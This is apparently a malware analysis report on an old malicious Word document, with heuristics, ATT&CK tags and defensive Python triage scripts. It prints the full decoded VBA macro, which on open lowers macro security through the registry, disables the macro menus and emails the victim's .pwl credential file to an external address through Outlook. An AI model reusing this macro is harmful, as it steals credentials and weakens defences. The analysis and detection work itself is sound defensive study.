Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9c0c3e1ab9dea423…

MALICIOUS

Office (OLE)

Size: 63.5 KB
Created: 1999-04-19 20:49:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 84ba0d53f099a57021f282230185bb18
SHA-1: 4e2fb041bbb1023b2a4a42b10ed5db2e38241efe
SHA-256: 9c0c3e1ab9dea423cf17357537f2993526970383630aa48b6d9d046588cff758
Risk score: 200

Malware Insights

MITRE ATT&CK
  • T1566.001 Phishing: Spearphishing Attachment
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1562.001 Impair Defenses: Disable or Modify Tools (macro security level written to 1, Tools > Macro and Macro > Security... menu items disabled)
  • T1071.001 Application Layer Protocol: Web Protocols (as tagged by the scanner; note that the macro itself exfiltrates through the local Outlook client over MAPI, not over HTTP)

The sample is a malicious Word document whose VBA macro runs automatically when the file is opened (Document_Open; an empty Document_New stub is also present). It first weakens Word's macro protection: if the Office 9.0 (Word 2000) value HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level exists, it is set to 1 (Low, macros run without a prompt) through System.PrivateProfileString with an empty file name, which Word treats as registry access, and the Macro > Security... menu item is disabled; otherwise (for example on Word 97, which the file's Word 8.0 authoring stamp suggests) the Tools > Macro menu is disabled instead. The macro then resolves the Windows directory with GetWindowsDirectoryA, builds the path <WinDir>\<UserName>.pwl, the Windows 9x/Me password-list (cached credentials) file, creates an Outlook.Application COM object, logs on to the MAPI namespace and sends a message to 'neetazz86@hotmail.com' with the subject 'Pwl From <UserName>' and the body 'Here it is' with that file attached, then calls Delete on the message object to remove the trace and logs off. Two caveats for the analyst: <UserName> comes from Application.UserName (Word's User Information name), which only matches the Windows logon name used for the .pwl file when the user left it at the default, and On Error Resume Next suppresses every failure (no Outlook, no .pwl file, no Office 9.0 key), so on a modern system the macro typically runs to completion without any visible effect. The behaviour is credential exfiltration over the victim's own mail client; the macro contains no logic to attach or spread the document itself.

Heuristics 4

  • VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
    Document contains VBA macro code
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open auto-execution entry point: the macro runs as soon as the document is opened, without any user action beyond enabling macros
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call (here "Outlook.Application", COM automation of the installed mail client)
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
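The indicators the summary and the source-level heuristics above rely on can be pulled out of decoded VBA with a few regular expressions. The following Python is an added example, not the scanner's code and not part of the original report; it triages a constructed, abridged copy of the Document_Open macro reproduced later on this page (the sample input is embedded inline) and reports auto-exec entry points, CreateObject ProgIDs, Win32 imports, registry values touched through PrivateProfileString, mail-send and attachment calls, and hard-coded e-mail addresses and file extensions. The rule identifiers it emits reuse the report's OLE_VBA_DOCOPEN and OLE_VBA_CREATEOBJ names, but MAIL_EXFIL and MACRO_SECURITY_TAMPER are hypothetical names chosen here, and all of the matching logic is an approximation of the scanner's, which this page does not publish.

```python
import json
import re
from typing import Dict, List

# Constructed test input: an abridged copy of the decoded Document_Open macro
# shown in this report (identifiers and literals kept as in the sample).
SAMPLE_VBA = r'''
Private Sub Document_New()
End Sub

Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1
Else
CommandBars("Tools").Controls("Macro").Enabled = False
End If
    GetUser = Application.UserName
    Xx = GetWindowsDirectory(ThePath, 255)
    PwlPath = Left(ThePath, Xx) & "\" & GetUser & ".pwl"
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
        DasMapiName.Logon
        TheAddress = "neetazz86@hotmail.com"
        Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
        BreakUmOffASlice.Recipients.Add TheAddress
        BreakUmOffASlice.Attachments.Add PwlPath
        BreakUmOffASlice.Send
        DasMapiName.Logoff
End Sub

Public Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
'''

# Procedure names that Word/Excel run without user interaction.
AUTOEXEC_RE = re.compile(
    r'^\s*(?:Private\s+|Public\s+)?Sub\s+'
    r'(AutoOpen|AutoExec|AutoNew|AutoClose|Auto_Open|Document_Open|Document_New|'
    r'Document_Close|Workbook_Open|Workbook_Activate)\s*\(',
    re.IGNORECASE | re.MULTILINE)
CREATEOBJ_RE = re.compile(r'\bCreateObject\s*\(\s*"([^"]+)"', re.IGNORECASE)
DECLARE_RE = re.compile(r'\bDeclare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"', re.IGNORECASE)
# PrivateProfileString with an empty file name is Word's registry accessor.
REG_RE = re.compile(r'PrivateProfileString\s*\(\s*""\s*,\s*"(HKEY_[^"]+)"\s*,\s*"([^"]+)"', re.IGNORECASE)
EMAIL_RE = re.compile(r'"([\w.+-]+@[\w-]+\.[\w.-]+)"')
STRLIT_RE = re.compile(r'"([^"]*)"')


def triage_vba(source: str) -> Dict[str, object]:
    """Static triage of decoded VBA source: how the macro starts, what it
    instantiates or imports, and where data goes. Naive by design: it does
    not resolve string concatenation or Chr() obfuscation."""
    literals = STRLIT_RE.findall(source)
    return {
        "auto_exec": [m.group(1) for m in AUTOEXEC_RE.finditer(source)],
        "create_object": sorted({m.group(1) for m in CREATEOBJ_RE.finditer(source)}),
        "win32_imports": [f"{name} ({lib})" for name, lib in DECLARE_RE.findall(source)],
        "registry_keys": sorted({f"{key}\\{value}" for key, value in REG_RE.findall(source)}),
        "email_addresses": sorted({m.group(1) for m in EMAIL_RE.finditer(source)}),
        "file_extensions": sorted({s for s in literals if re.fullmatch(r'\.\w{1,4}', s)}),
        "sends_mail": bool(re.search(r'\.Send\s*$', source, re.IGNORECASE | re.MULTILINE)),
        "adds_attachment": bool(re.search(r'\.Attachments\.Add\b', source, re.IGNORECASE)),
        "disables_ui": bool(re.search(r'CommandBars\(.*\)\.Controls\(.*\)\.Enabled\s*=\s*False',
                                      source, re.IGNORECASE)),
    }


def heuristics(findings: Dict[str, object]) -> List[str]:
    """Approximation of the report's source-level rules. OLE_VBA_DOCOPEN and
    OLE_VBA_CREATEOBJ are the report's names; the other two are hypothetical."""
    hits: List[str] = []
    if findings["auto_exec"]:
        hits.append("OLE_VBA_DOCOPEN")
    if findings["create_object"]:
        hits.append("OLE_VBA_CREATEOBJ")
    if findings["sends_mail"] and findings["adds_attachment"]:
        hits.append("MAIL_EXFIL")              # hypothetical rule name
    if findings["registry_keys"] or findings["disables_ui"]:
        hits.append("MACRO_SECURITY_TAMPER")   # hypothetical rule name
    return hits


if __name__ == "__main__":
    result = triage_vba(SAMPLE_VBA)
    print(json.dumps(result, indent=2))
    print("rules:", heuristics(result))
```

In practice the input comes from olevba (`olevba --decode sample.doc`, from oletools, the extractor named in the artifact table below); feed its decoded source to triage_vba. The regexes work on this sample because the report rates obfuscation as unlikely; a macro that builds "Outlook.Application" from Chr() calls or split strings would pass the CreateObject check untouched, which is exactly the gap the p-code heuristic above is meant to close.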

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5114 bytes
SHA-256: 23ded3e2614510c1de86e83d556b87fd67345d8b1bc9418b8b5b2d6959ac31c5
Detection
ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Private Sub Document_New()

End Sub

Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1
Else
CommandBars("Tools").Controls("Macro").Enabled = False
End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice, GetUser, Xx
Dim ThePath As String * 255
Dim PwlPath As String

    GetUser = Application.UserName
    Xx = GetWindowsDirectory(ThePath, 255)
    PwlPath = Left(ThePath, Xx) & "\" & GetUser & ".pwl"
    
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
        
        DasMapiName.Logon
        TheAddress = "neetazz86@hotmail.com"
        Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
        BreakUmOffASlice.Recipients.Add TheAddress
        BreakUmOffASlice.Subject = "Pwl From " & Application.UserName
        BreakUmOffASlice.Body = "Here it is"
        BreakUmOffASlice.Attachments.Add PwlPath
        BreakUmOffASlice.Send
        BreakUmOffASlice.Delete
        DasMapiName.Logoff
            
     '  Selection.TypeText PwlPath
        
   End Sub

Attribute VB_Name = "Module1"
Public Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
'ucbC><Kd

' Processing file: /opt/analyzer/scan_staging/d5f09024d48247d0912e7e319d93cd7b.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 7428 bytes
' Line #0:
' Line #1:
' Line #2:
' 	FuncDefn (Private Sub Document_New())
' Line #3:
' Line #4:
' 	EndSub 
' Line #5:
' Line #6:
' 	FuncDefn (Private Sub Document_Open())
' Line #7:
' 	OnError (Resume Next) 
' Line #8:
' 	LitStr 0x0000 ""
' 	LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' 	LitStr 0x0005 "Level"
' 	Ld System 
' 	ArgsMemLd PrivateProfileString 0x0003 
' 	LitStr 0x0000 ""
' 	Ne 
' 	IfBlock 
' Line #9:
' 	LitVarSpecial (False)
' 	LitStr 0x000B "Security..."
' 	LitStr 0x0005 "Macro"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemSt Enabled 
' Line #10:
' 	LitDI2 0x0001 
' 	LitStr 0x0000 ""
' 	LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' 	LitStr 0x0005 "Level"
' 	Ld System 
' 	ArgsMemSt PrivateProfileString 0x0003 
' Line #11:
' 	ElseBlock 
' Line #12:
' 	LitVarSpecial (False)
' 	LitStr 0x0005 "Macro"
' 	LitStr 0x0005 "Tools"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemSt Enabled 
' Line #13:
' 	EndIfBlock 
' Line #14:
' Line #15:
' 	Dim 
' 	VarDefn UngaDasOutlook
' 	VarDefn DasMapiName
' 	VarDefn BreakUmOffASlice
' 	VarDefn GetUser
' 	VarDefn Xx
' Line #16:
' 	Dim 
' 	LitDI2 0x00FF 
' 	VarDefn ThePath
' Line #17:
' 	Dim 
' 	VarDefn PwlPath (As String)
' Line #18:
' Line #19:
' 	Ld Application 
' 	MemLd UserName 
' 	St GetUser 
' Line #20:
' 	Ld ThePath 
' 	LitDI2 0x00FF 
' 	ArgsLd GetWindowsDirectory 0x0002 
' 	St Xx 
' Line #21:
' 	Ld ThePath 
' 	Ld Xx 
' 	ArgsLd LBound 0x0002 
' 	LitStr 0x0001 "\"
' 	Concat 
' 	Ld GetUser 
' 	Concat 
' 	LitStr 0x0004 ".pwl"
' 	Concat 
' 	St PwlPath 
' Line #22:
' Line #23:
' 	SetStmt 
' 	LitStr 0x0013 "Outlook.Application"
' 	ArgsLd CreateObject 0x0001 
' 	Set UngaDasOutlook 
' Line #24:
' 	SetStmt 
' 	LitStr 0x0004 "MAPI"
' 	Ld UngaDasOutlook 
' 	ArgsMemLd GetNameSpace 0x0001 
' 	Set DasMapiName 
' Line #25:
' Line #26:
' 	Ld DasMapiName 
' 	ArgsMemCall Logon 0x0000 
' Line #27:
' 	LitStr 0x0015 "neetazz86@hotmail.com"
' 	St TheAddress 
' Line #28:
' 	SetStmt 
' 	LitDI2 0x0000 
' 	Ld 
... (truncated)
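When olevba cannot recover source (the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic exists for exactly that case), the same triage has to be done on a p-code disassembly like the one printed above. The Python below is an added example, not pcodedmp and not the scanner's rule; it parses a constructed excerpt of that dump (embedded inline, with the leading `' ` the report adds to each line) and recovers call arguments from the operand order: VBA p-code pushes literals and the `Ld` object before the `Args*` opcode that consumes them, so the `LitStr` immediately preceding `ArgsLd CreateObject 0x0001` is the ProgID, and the three strings plus the `LitDI2` pushed before `ArgsMemSt PrivateProfileString 0x0003` are the registry path, value name and stored value. The opcode names and the stack discipline are taken from the dump as printed; opcodes the excerpt does not show, and nested expressions, are not handled.

```python
import re
from typing import Dict, List, Tuple

# Constructed excerpt of the p-code disassembly reproduced in this report,
# in the same "' <opcode>" comment form, trimmed to the statements of interest.
SAMPLE_PCODE = r'''
' Line #6:
' 	FuncDefn (Private Sub Document_Open())
' Line #7:
' 	OnError (Resume Next) 
' Line #8:
' 	LitStr 0x0000 ""
' 	LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' 	LitStr 0x0005 "Level"
' 	Ld System 
' 	ArgsMemLd PrivateProfileString 0x0003 
' 	LitStr 0x0000 ""
' 	Ne 
' 	IfBlock 
' Line #10:
' 	LitDI2 0x0001 
' 	LitStr 0x0000 ""
' 	LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' 	LitStr 0x0005 "Level"
' 	Ld System 
' 	ArgsMemSt PrivateProfileString 0x0003 
' Line #23:
' 	SetStmt 
' 	LitStr 0x0013 "Outlook.Application"
' 	ArgsLd CreateObject 0x0001 
' 	Set UngaDasOutlook 
' Line #27:
' 	LitStr 0x0015 "neetazz86@hotmail.com"
' 	St TheAddress 
'''

AUTOEXEC = {"autoopen", "autoexec", "autonew", "autoclose", "auto_open",
            "document_open", "document_new", "document_close", "workbook_open"}
EXEC_TOKENS = {"createobject", "getobject", "shell", "shellexecute", "urldownloadtofile"}

FUNCDEFN_RE = re.compile(r'^FuncDefn\s+\((?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)')
LITSTR_RE = re.compile(r'^LitStr\s+0x[0-9A-Fa-f]+\s+"(.*)"$')
LITINT_RE = re.compile(r'^LitDI\d\s+0x([0-9A-Fa-f]+)')
LD_RE = re.compile(r'^Ld\s+(\w+)$')
CALL_RE = re.compile(r'^(ArgsLd|ArgsMemLd|ArgsCall|ArgsMemCall|ArgsMemSt)\s+(\w+)\s+0x([0-9A-Fa-f]+)$')


def scan_pcode(dump: str) -> Dict[str, List]:
    """Walk a pcodedmp-style listing and recover what a triage needs: auto-exec
    procedures, execution-style calls with their literal arguments, registry
    writes made through PrivateProfileString, and the string literals."""
    proc = "<module>"
    stack: List[str] = []          # operands pushed since the current statement began
    auto_exec: List[str] = []
    exec_calls: List[Tuple[str, str, Tuple[str, ...]]] = []
    registry_writes: List[Tuple[str, str, str]] = []
    strings: List[str] = []
    for raw in dump.splitlines():
        line = raw.lstrip("' \t").rstrip()
        if not line:
            continue
        if line.startswith("Line #"):          # statement boundary: the operand stack is empty here
            stack = []
        elif m := FUNCDEFN_RE.match(line):
            proc = m.group(1)
            if proc.lower() in AUTOEXEC:
                auto_exec.append(proc)
            stack = []
        elif m := LITSTR_RE.match(line):
            stack.append(m.group(1))
            if m.group(1):
                strings.append(m.group(1))
        elif m := LITINT_RE.match(line):
            stack.append(str(int(m.group(1), 16)))
        elif m := LD_RE.match(line):
            stack.append(m.group(1))
        elif m := CALL_RE.match(line):
            opcode, name, argc = m.group(1), m.group(2), int(m.group(3), 16)
            if opcode.startswith("ArgsMem") and stack:
                stack.pop()                     # the object the member was loaded from ("Ld System")
            start = max(0, len(stack) - argc)
            args = tuple(stack[start:])         # arguments were pushed in call order
            del stack[start:]
            if name.lower() in EXEC_TOKENS:
                exec_calls.append((proc, name, args))
            if opcode == "ArgsMemSt" and name == "PrivateProfileString" and len(args) == 3 and args[0] == "":
                # Empty file name means the registry; the value to store was pushed before the arguments.
                value = stack.pop() if stack else "?"
                registry_writes.append((args[1], args[2], value))
            stack.append(f"<{name}()>")         # the call's result stays on the stack
        # every other opcode (SetStmt, St, Ne, IfBlock, OnError ...) is irrelevant here
    return {"auto_exec": auto_exec, "exec_calls": exec_calls,
            "registry_writes": registry_writes, "strings": list(dict.fromkeys(strings))}


def autoexec_with_exec(result: Dict[str, List]) -> bool:
    """The condition behind a rule like OLE_VBA_PCODE_AUTOEXEC_EXEC: an auto-exec
    entry point whose own body reaches an object-execution token."""
    auto = set(result["auto_exec"])
    return any(proc in auto for proc, _, _ in result["exec_calls"])


if __name__ == "__main__":
    r = scan_pcode(SAMPLE_PCODE)
    for key, value in r.items():
        print(f"{key}: {value}")
    print("autoexec+exec:", autoexec_with_exec(r))
```

A real dump has the full 0x0003 argument lists and many more opcodes than the excerpt; the useful property is that each `Line #N` marker resets the stack, so a wrong guess about one unhandled opcode only corrupts the statement it sits in. Because this works on the compiled stream, it still fires when the source text in the module has been stripped or replaced (VBA "stomping"), which the source-level checks cannot see.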